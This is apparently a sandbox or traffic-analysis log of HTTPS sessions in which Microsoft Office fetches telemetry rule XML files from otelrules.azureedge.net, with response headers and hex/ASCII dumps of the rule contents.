                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:36 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:36 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 1399
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:28:00 GMT
                                                                                                                                                                                                ETag: "0x8DC582BE976026E"
                                                                                                                                                                                                x-ms-request-id: 85bacdce-f01e-003f-758c-3ad19d000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095436Z-185f5d8b95c4vwv8hC1NYCy4v40000000a60000000009fn3
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:36 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702301" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPr


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                128192.168.2.74983513.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:36 UTC192OUTGET /rules/rule702300v1s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:36 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:36 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 1362
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT
                                                                                                                                                                                                ETag: "0x8DC582BDC13EFEF"
                                                                                                                                                                                                x-ms-request-id: 06bc2162-901e-0016-6af6-3aefe9000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095436Z-185f5d8b95cp7lkfhC1NYC7rpw0000000a7g0000000058n5
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:36 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 6a 65 63 74 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702300" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProject" S="Medium" /> <F T="2">


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                129192.168.2.74983613.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:36 UTC192OUTGET /rules/rule703401v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:36 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:36 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 1425
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT
                                                                                                                                                                                                ETag: "0x8DC582BE6BD89A1"
                                                                                                                                                                                                x-ms-request-id: 5a5a1706-c01e-0079-6c8c-3ae51a000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095436Z-1777c6cb754wcxkwhC1TEB3c6w00000009a000000000askd
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:36 UTC1425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703401" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexus


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                130192.168.2.74983813.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:37 UTC192OUTGET /rules/rule702501v1s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:37 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:37 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 1415
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:57 GMT
                                                                                                                                                                                                ETag: "0x8DC582BE7C66E85"
                                                                                                                                                                                                x-ms-request-id: ab7768f3-b01e-0098-59ec-3acead000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095437Z-185f5d8b95cdcwrthC1NYCy5b80000000a20000000005tr1
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:37 UTC1415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                131192.168.2.74983713.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:37 UTC192OUTGET /rules/rule703400v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:37 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:37 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 1388
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT
                                                                                                                                                                                                ETag: "0x8DC582BDBD9126E"
                                                                                                                                                                                                x-ms-request-id: 073925de-a01e-0032-2d8c-3a1949000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095437Z-185f5d8b95cqnkdjhC1NYCm8w800000009x0000000008cxr
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:37 UTC1388INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 22 20 53 3d 22 4d
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703400" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammableSurfaces" S="M


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                132192.168.2.74984013.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:37 UTC192OUTGET /rules/rule700501v1s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:37 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:37 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 1405
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:58 GMT
                                                                                                                                                                                                ETag: "0x8DC582BE89A8F82"
                                                                                                                                                                                                x-ms-request-id: 1afac609-801e-00a3-2b8c-3a7cfb000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095437Z-185f5d8b95cjbkr4hC1NYCeu2400000009z000000000467b
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:37 UTC1405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 6f 77 65 72 50 6f 69 6e 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.PowerPoint.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                133192.168.2.74983913.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:37 UTC192OUTGET /rules/rule702500v1s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:37 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:37 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 1378
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
                                                                                                                                                                                                ETag: "0x8DC582BDB813B3F"
                                                                                                                                                                                                x-ms-request-id: 0c3517a5-201e-0003-7a8c-3af85a000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095437Z-1777c6cb754wcxkwhC1TEB3c6w00000009dg000000002x5x
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:37 UTC1378INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammability" S="Medium" />


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                134192.168.2.74984113.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:37 UTC192OUTGET /rules/rule700500v1s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:37 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:37 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 1368
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                                                                                                                                ETag: "0x8DC582BE51CE7B3"
                                                                                                                                                                                                x-ms-request-id: bfe6eb71-201e-006e-168c-3abbe3000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095437Z-r1d97b99577brct2hC1TEBambg00000002b0000000009a1g
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:37 UTC1368INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 6f 77 65 72 50 6f 69 6e 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 6f 77 65 72 50 6f 69 6e 74 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.PowerPoint" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPowerPoint" S="Medium" /> <F T=


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                135192.168.2.74984313.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:38 UTC192OUTGET /rules/rule702551v1s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:38 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:38 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 1415
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
                                                                                                                                                                                                ETag: "0x8DC582BDCE9703A"
                                                                                                                                                                                                x-ms-request-id: a16a2ddb-901e-0064-058c-3ae8a6000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095438Z-185f5d8b95cgrrn8hC1NYCgwh400000009tg00000000k4bv
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:38 UTC1415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702551" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Personalization.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                136192.168.2.74984213.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:38 UTC192OUTGET /rules/rule702550v1s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:38 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:38 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 1378
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                                                                                                                                ETag: "0x8DC582BE584C214"
                                                                                                                                                                                                x-ms-request-id: 4ac405f8-001e-002b-168c-3a99f2000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095438Z-185f5d8b95ckwnflhC1NYCx9qs0000000a40000000007rkk
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
